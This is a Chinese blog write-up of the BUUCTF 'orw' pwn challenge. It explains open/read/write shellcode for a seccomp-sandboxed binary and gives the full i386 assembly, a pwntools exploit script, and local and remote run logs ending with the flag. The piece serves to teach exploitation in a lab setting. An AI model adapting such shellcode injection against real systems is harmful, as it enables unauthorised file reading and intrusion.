从零开始做题:逆向 ret2shellcode orw

已于 2024-01-29 08:59:54 修改
阅读量748 收藏 8
点赞数 6
分类专栏: 逆向 二进制 Re 文章标签: 服务器 linux 网络安全 安全 系统安全
于 2024-01-28 23:08:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44626085/article/details/135789432
版权

1.题目信息

BUUCTF在线评测

下载orw时防病毒要关闭

 

2.题目分析 

orw是open、read、write的简写。有时候binary会通过prctl、seccomp进行沙箱保护,并不能getshell。只能通过orw的方式拿到flag。

fd=open(‘./flag’); # 打开flag文件,得到fd

read(fd,buf,0x30); #通过fd将flag的内容读到内存中

write(1,buf,0x30); #将内存中的flag内容输出到屏幕

在相关目录里面写入以下内容

holyeyes@ubuntu:~/Re/6$ echo "flag{testtest}" >./flag
holyeyes@ubuntu:~/Re/6$ 
 

3.解题脚本

root@pwn_test1604:/ctf/work/6# ls
orw  orw.i64  orw.py
root@pwn_test1604:/ctf/work/6# python
Python 2.7.12 (default, Nov 12 2018, 14:36:49) 
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "./flag".encode('hex')
'2e2f666c6167'
>>> "./flag\x00\x00".encode('hex')
'2e2f666c61670000'
>>>

3.1只用修改的内容 

context.arch='i386'

DEBUG = 1

LOCAL = True
BIN   ='./orw'
HOST  ='node5.buuoj.cn'
PORT  =25178

def exploit(p):

	p.recv()
	pl = """

    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx

    push 0x00006761
    push 0x6c662f2e
   
    mov eax, 5    #open('./flag')
    mov ebx, esp
    mov ecx, 0
    mov edx, 0
    int 0x80

    mov ebx, eax
    mov eax, 3     #read(fd,esp,0x30)
    mov ecx, esp
    mov edx, 0x30
    int 0x80

    mov eax, 4     #write(1,esp,0x30)
    mov ebx, 1
    mov ecx, esp
    mov edx, 0x30
    int 0x80

	"""
	p.sendline(asm(pl))
	p.interactive()
	return

3.2全部脚本 

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pickle import TRUE
from pwn import *
import sys

context.terminal=["tmux","sp","-h"]
context.log_level='debug'
context.arch='i386'

DEBUG = 1

LOCAL = True
BIN   ='./orw'
HOST  ='node5.buuoj.cn'
PORT  =25178




def get_base_address(proc):
	return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)

def debug(bps,_s):
    script = "handle SIGALRM ignore\n"
    PIE = get_base_address(p)
    script += "set $_base = 0x{:x}\n".format(PIE)
    for bp in bps:
        script += "b *0x%x\n"%(PIE+bp)
    script += _s
    gdb.attach(p,gdbscript=script)

# pwn,caidan,leak,libc
# recv recvuntil send sendline sendlineafter sendafter
#aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab



def exploit(p):

	p.recv()
	pl = """

    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx

    push 0x00006761
    push 0x6c662f2e
   
    mov eax, 5    #open('./flag')
    mov ebx, esp
    mov ecx, 0
    mov edx, 0
    int 0x80

    mov ebx, eax
    mov eax, 3     #read(fd,esp,0x30)
    mov ecx, esp
    mov edx, 0x30
    int 0x80

    mov eax, 4     #write(1,esp,0x30)
    mov ebx, 1
    mov ecx, esp
    mov edx, 0x30
    int 0x80

	"""
	p.sendline(asm(pl))
	p.interactive()
	return

if __name__ == "__main__":
	elf = ELF(BIN)
	if len(sys.argv) > 1:
		LOCAL = False
		p = remote(HOST, PORT)
		exploit(p)
	else:
		LOCAL = True
		p = process(BIN)
		log.info('PID: '+ str(proc.pidof(p)[0]))
		# pause
		if DEBUG:
			debug([],"")
		exploit(p)

 3.3 运行本地

root@pwn_test1604:/ctf/work/6# tmux

root@pwn_test1604:/ctf/work/6# python orw.py 

root@pwn_test1604:/ctf/work/6# python orw.py                                        [25/25]│   f 1 f765ab23 __read_nocancel+25                                                  [0/48]
[DEBUG] PLT 0x8048370 read                                                                 │   f 2  8048582 main+58
[DEBUG] PLT 0x8048370 read                                                                 │   f 3 f759d637 __libc_start_main+247
[DEBUG] PLT 0x8048380 printf                                                               │pwndbg> c
[DEBUG] PLT 0x8048390 __stack_chk_fail                                                     │Continuing.
[DEBUG] PLT 0x80483a0 __libc_start_main                                                    │
[DEBUG] PLT 0x80483b0 prctl                                                                │Program received signal SIGSEGV, Segmentation fault.
[DEBUG] PLT 0x80483c0 __gmon_start__                                                       │0x0804a0a8 in shellcode ()
[*] '/ctf/work/6/orw'                                                                      │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    Arch:     i386-32-little                                                               │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────
    RELRO:    Partial RELRO                                                                │ EAX  0x30
    Stack:    Canary found                                                                 │ EBX  0x1
    NX:       NX disabled                                                                  │ ECX  0xffbd74b4 ◂— 0x67616c66 ('flag')
    PIE:      No PIE (0x8048000)                                                           │ EDX  0x30
    RWX:      Has RWX segments                                                             │ EDI  0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */
[+] Starting local process './orw': pid 179                                                │ ESI  0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */
[*] PID: 179                                                                               │ EBP  0xffbd74c8 ◂— 0x0
[DEBUG] Wrote gdb script to '/tmp/pwn1jT2Ys.gdb'                                           │ ESP  0xffbd74b4 ◂— 0x67616c66 ('flag')
    file ./orw                                                                             │ EIP  0x804a0a8 (shellcode+72) ◂— 0xa /* '\n' */
    handle SIGALRM ignore                                                                  │────────────────────────────────────────[ DISASM ]────────────────────────────────────────
    set $_base = 0x8048000                                                                 │ ► 0x804a0a8 <shellcode+72>    or     al, byte ptr [eax]
[*] running in new terminal: /usr/bin/gdb -q  "./orw" 179 -x "/tmp/pwn1jT2Ys.gdb"          │   0x804a0aa <shellcode+74>    add    byte ptr [eax], al
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'sp', '-h', '/usr/bin/gdb -q  "./orw" 1│   0x804a0ac <shellcode+76>    add    byte ptr [eax], al
79 -x "/tmp/pwn1jT2Ys.gdb"']                                                               │   0x804a0ae <shellcode+78>    add    byte ptr [eax], al
[+] Waiting for debugger: Done 
[DEBUG] Received 0x17 bytes:                                                         [0/25]│   f 1 f765ab23 __read_nocancel+25                                                  [0/48]
    'Give my your shellcode:'                                                              │   f 2  8048582 main+58
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/inc│   f 3 f759d637 __libc_start_main+247
ludes /dev/stdin                                                                           │pwndbg> c
[DEBUG] Assembling                                                                         │Continuing.
    .section .shellcode,"awx"                                                              │
    .global _start                                                                         │Program received signal SIGSEGV, Segmentation fault.
    .global __start                                                                        │0x0804a0a8 in shellcode ()
    _start:                                                                                │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    __start:                                                                               │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────
    .intel_syntax noprefix                                                                 │ EAX  0x30
        xor eax, eax                                                                       │ EBX  0x1
        xor ebx, ebx                                                                       │ ECX  0xffbd74b4 ◂— 0x67616c66 ('flag')
        xor ecx, ecx                                                                       │ EDX  0x30
        xor edx, edx                                                                       │ EDI  0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */
        push 0x00006761                                                                    │ ESI  0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */
        push 0x6c662f2e                                                                    │ EBP  0xffbd74c8 ◂— 0x0
        mov eax, 5 #open('./flag')                                                         │ ESP  0xffbd74b4 ◂— 0x67616c66 ('flag')
        mov ebx, esp                                                                       │ EIP  0x804a0a8 (shellcode+72) ◂— 0xa /* '\n' */
        mov ecx, 0                                                                         │────────────────────────────────────────[ DISASM ]────────────────────────────────────────
        mov edx, 0                                                                         │ ► 0x804a0a8 <shellcode+72>    or     al, byte ptr [eax]
        int 0x80                                                                           │   0x804a0aa <shellcode+74>    add    byte ptr [eax], al
        mov ebx, eax                                                                       │   0x804a0ac <shellcode+76>    add    byte ptr [eax], al
        mov eax, 3 #read(fd,esp,0x30)                                                      │   0x804a0ae <shellcode+78>    add    byte ptr [eax], al
        mov ecx, esp                                                                       │   0x804a0b0 <shellcode+80>    add    byte ptr [eax], al
        mov edx, 0x30                                                                      │   0x804a0b2 <shellcode+82>    add    byte ptr [eax], al
        int 0x80                                                                           │   0x804a0b4 <shellcode+84>    add    byte ptr [eax], al
        mov eax, 4 #write(1,esp,0x30)                                                      │   0x804a0b6 <shellcode+86>    add    byte ptr [eax], al
        mov ebx, 1                                                                         │   0x804a0b8 <shellcode+88>    add    byte ptr [eax], al
        mov ecx, esp                                                                       │   0x804a0ba <shellcode+90>    add    byte ptr [eax], al
        mov edx, 0x30                                                                      │   0x804a0bc <shellcode+92>    add    byte ptr [eax], al
        int 0x80                                                                           │────────────────────────────────────────[ STACK ]─────────────────────────────────────────
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-bw_t9d/step2 /tmp/pwn-asm-bw_t9d/s│00:0000│ ecx esp  0xffbd74b4 ◂— 0x67616c66 ('flag')
tep1                                                                                       │01:0004│          0xffbd74b8 ◂— 0x7365747b ('{tes')
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-bw_t9d/step3 │02:0008│          0xffbd74bc ◂— 0x73657474 ('ttes')
/tmp/pwn-asm-bw_t9d/step4                                                                  │03:000c│          0xffbd74c0 ◂— 0xf70a7d74
[DEBUG] Sent 0x49 bytes:                                                                   │04:0010│          0xffbd74c4 —▸ 0xffbd74e0 ◂— 0x1
    00000000  31 c0 31 db  31 c9 31 d2  68 61 67 00  00 68 2e 2f  │1·1·│1·1·│hag·│·h./│    │05:0014│ ebp      0xffbd74c8 ◂— 0x0
    00000010  66 6c b8 05  00 00 00 89  e3 b9 00 00  00 00 ba 00  │fl··│····│····│····│    │06:0018│          0xffbd74cc —▸ 0xf759d637 (__libc_start_main+247) ◂— add    esp, 0x10
    00000020  00 00 00 cd  80 89 c3 b8  03 00 00 00  89 e1 ba 30  │····│····│····│···0│    │07:001c│          0xffbd74d0 —▸ 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0
    00000030  00 00 00 cd  80 b8 04 00  00 00 bb 01  00 00 00 89  │····│····│····│····│    │x1b1db0 */
    00000040  e1 ba 30 00  00 00 cd 80  0a                        │··0·│····│·│            │──────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────    00000049                                                                               │ ► f 0  804a0a8 shellcode+72
[*] Switching to interactive mode                                                          │   f 1 67616c66
[DEBUG] Received 0x30 bytes:                                                               │   f 2 7365747b
    00000000  66 6c 61 67  7b 74 65 73  74 74 65 73  74 7d 0a f7  │flag│{tes│ttes│t}··│    │   f 3 73657474
    00000010  e0 74 bd ff  00 00 00 00  37 d6 59 f7  00 70 73 f7  │·t··│····│7·Y·│·ps·│    │   f 4 f70a7d74
    00000020  00 70 73 f7  00 00 00 00  37 d6 59 f7  01 00 00 00  │·ps·│····│7·Y·│····│    │   f 5 ffbd74e0
    00000030                                                                               │   f 6 f759d637 __libc_start_main+247
flag{testtest}                                                                             │Program received signal SIGSEGV (fault address 0x30)
��\xff\x00\x00\x00\x007�ps�ps�\x007�\x00$

3.4 运行远程

root@pwn_test1604:/ctf/work/6# python orw.py 1

root@pwn_test1604:/ctf/work/6# tmux
[exited]
root@pwn_test1604:/ctf/work/6# python orw.py 1
[DEBUG] PLT 0x8048370 read
[DEBUG] PLT 0x8048380 printf
[DEBUG] PLT 0x8048390 __stack_chk_fail
[DEBUG] PLT 0x80483a0 __libc_start_main
[DEBUG] PLT 0x80483b0 prctl
[DEBUG] PLT 0x80483c0 __gmon_start__
[*] '/ctf/work/6/orw'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Opening connection to node5.buuoj.cn on port 25178: Done
[DEBUG] Received 0x17 bytes:
    'Give my your shellcode:'
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/includes /dev/stdin
[DEBUG] Assembling
    .section .shellcode,"awx"
    .global _start
    .global __start
    _start:
    __start:
    .intel_syntax noprefix
        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        xor edx, edx
        push 0x00006761
        push 0x6c662f2e
        mov eax, 5 #open('./flag')
        mov ebx, esp
        mov ecx, 0
        mov edx, 0
        int 0x80
        mov ebx, eax
        mov eax, 3 #read(fd,esp,0x30)
        mov ecx, esp
        mov edx, 0x30
        int 0x80
        mov eax, 4 #write(1,esp,0x30)
        mov ebx, 1
        mov ecx, esp
        mov edx, 0x30
        int 0x80
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-C0CcaA/step2 /tmp/pwn-asm-C0CcaA/step1
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-C0CcaA/step3 /tmp/pwn-asm-C0CcaA/step4
[DEBUG] Sent 0x49 bytes:
    00000000  31 c0 31 db  31 c9 31 d2  68 61 67 00  00 68 2e 2f  │1·1·│1·1·│hag·│·h./│
    00000010  66 6c b8 05  00 00 00 89  e3 b9 00 00  00 00 ba 00  │fl··│····│····│····│
    00000020  00 00 00 cd  80 89 c3 b8  03 00 00 00  89 e1 ba 30  │····│····│····│···0│
    00000030  00 00 00 cd  80 b8 04 00  00 00 bb 01  00 00 00 89  │····│····│····│····│
    00000040  e1 ba 30 00  00 00 cd 80  0a                        │··0·│····│·│
    00000049
[*] Switching to interactive mode
[DEBUG] Received 0x30 bytes:
    00000000  66 6c 61 67  7b 31 30 33  37 66 34 39  62 2d 33 30  │flag│{103│7f49│b-30│
    00000010  36 63 2d 34  30 34 32 2d  38 34 31 31  2d 34 38 34  │6c-4│042-│8411│-484│
    00000020  39 32 64 61  35 37 30 36  62 7d 0a f7  01 00 00 00  │92da│5706│b}··│····│
    00000030
flag{1037f49b-306c-4042-8411-48492da5706b}
�\x0[DEBUG] Received 0x2b bytes:
    'timeout: the monitored command dumped core\n'
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$

3.5 避坑提醒

用kali2023的虚机环境不行,要用ubuntu16.04的虚机环境就可以。

网络安全我来了
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn小白入门04---ret2shellcode
weixin_45943522的博客
02-21 1839
原理 ret2shellcode,当程序当中没有system函数时,我们需要自己往栈上写入一段shellcode,然后控制eip使其指向shellcode的地址。 shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。 在栈溢出的基础上,要想执行 shellcode,需要对应的程序在运行时,shellcode 所在的区域具有可执行权限。即必须关闭堆栈不可执行功能。 例(来自ctfwiki): 首先checksec: 发现程序没有开启任何保护,并且存在可读可写
ret2shellcode知识点及例
weixin_44864859的博客
05-19 842
ret2shellcode 检查程序的基础信息后发现和ret2text不同的是其关闭了nx防护,这就代表IP寄存器可以指向堆,栈了。 运行程序可以看到只有一个输入,接下来用ida打开进行分析。 与ret2text一样可以很明显的看到在main函数中调用了gets函数。我们同样可以控制返回地址,但返回到什么地方呢? 查看内部函数可以看到,此时程序中并没有用到system函数,那应该怎么办呢? 这里需要注意有两个点 1 NX: NX disabled 2 strncpy(buf2, &a
Ret2ShellCode
钞sir的博客
01-24 8099
红颜祸 千般柔情 相思难解两相若 蝶恋花 几经浮沉 枯骨终是化飞沙 简介 ret2shellcode顾名思义,就是return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcode,得到system(sh)的效果;ret2shellcode是栈溢出中一种简单而且常规的操作,当配合ROP等技术的使用后,非常有用 利用条件 ret2shel...
有趣的Shellcode和栈
热门推荐
whklhhhh的博客
03-26 2万+
学弟问了一个ctf-wiki上pwn入门的知识点,本身没什么意思 目下载链接 - sniperoj-pwn100-shellcode-x86-64 目简介 很明显栈溢出,buf位于栈顶,栈空间为0x10个字节(可以从buf的位置rsp+0rbp-10h看出),所以栈分布为 内容 偏移 buf rsp last_rbp rsp+0x10 ret_addr rsp+0x...
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 750
CTF-wiki的注解:ret2shellcode
pwn07.ret2syscall例
11-11
ret2syscall例
使用OllyDbg从零开始Cracking 第七章-call,ret.doc
09-19
使用OllyDbg从零开始Cracking 第七章-call,ret.doc
ret2libc2pwn 入门
02-11
pwn 入门
unret:将 ret 生成的 AST 转换回字符串
06-23
unret采用ret生成的正则表达式语法树并将其转换回字符串。 安装 $ npm install unret 用法 var ret = require ( "ret" ) ; var unret = require ( "unret" ) ; // Parse an expression with ret var syntaxTree = ...
单片机程序分析练习B2.doc
最新发布
11-20
单片机程序分析练习B2 本文档提供了单片机程序分析练习B2的知识点总结,涵盖了单片机程序设计、指令执行、寄存器操作、 flag 位操作、加减运算、逻辑运算、移位运算、程序执行结果等多方面的知识点。 一、...
ret2shellcode
qq_45691294的博客
12-18 4590
shellcode的含义: 在栈溢出的攻击技术中通常是要控制函数的返回地址到自己想要的地方执行自己想要执行的代码。ret2shellcode代表返回到shellcode中即控制函数的返回地址到预先设定好的shellcode区域中去执行shellcode代码,这是非常危险的。 这里学习一下shellcode的利用方式,用ret2shellcode作为例 先用checksec查看一下保护,可以看到,没有开启任何保护机制,且是一个32位的程序 使用IDA分析程序,只发现了主函数,并没有发现后门函数 get
pwn刷num35----ret2shellcode
tbsqigongzi的博客
04-29 294
BUUCTF-PWN-ciscn_2019_n_5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 未开启NX保护-----堆栈可执行,可注入shellcode 未开启PIE-----程序地址为真实地址 动态链接 运行程序后,先是让我们输入一个name,之后让我们输入一些信息,什么也看不出来 ida一下 注意两个函数 read(0, name, 0x64uLL);
解析两道pwnshellcode利用
weixin_44113469的博客
03-12 2000
两道都是shellcode直接利用,简单记录解的过程。 runit 逻辑不难,使用mmap()分配一块内存,然后通过read函数写入数据到这个内存块,接下来就直接执行我们输入的数据,所以可以直接构造shellcode注入到该内存块,完事。 exp ...
好好说话之ret2shellcode
hollk’s blog
06-22 1693
ret2shellcode-example 目路径 /ctf-challenges/pwn/stackoverflow/ret2shellcode/ret2shellcode-example 一、原理 ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shell...
基本ROP之ret2shellcode
至臻求学,胸怀云月
01-12 1613
原理 控制程序执行shellcode代码 shellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。 一般来说,shellcode需要我们自己进行填充,这其实是一种典型的利用方法。 执行条件: 对应二进制在执行时,shellcode所在区域需要可执行的权限。 过程 下载地址 查看程序保护机制 毫无保护 IDA看下汇编指令 发现gets危险函数 同时还有...
pwn 暑假复习二 简单rop
SsMing的博客
07-14 2050
例一:ret2shellcode 先复习一下计算与ebp的距离的方法,昨天复习的是用pattern来寻找,今天复习另一种,以ctfwiki的ret2text为例。先用ida打开查看源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvb...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值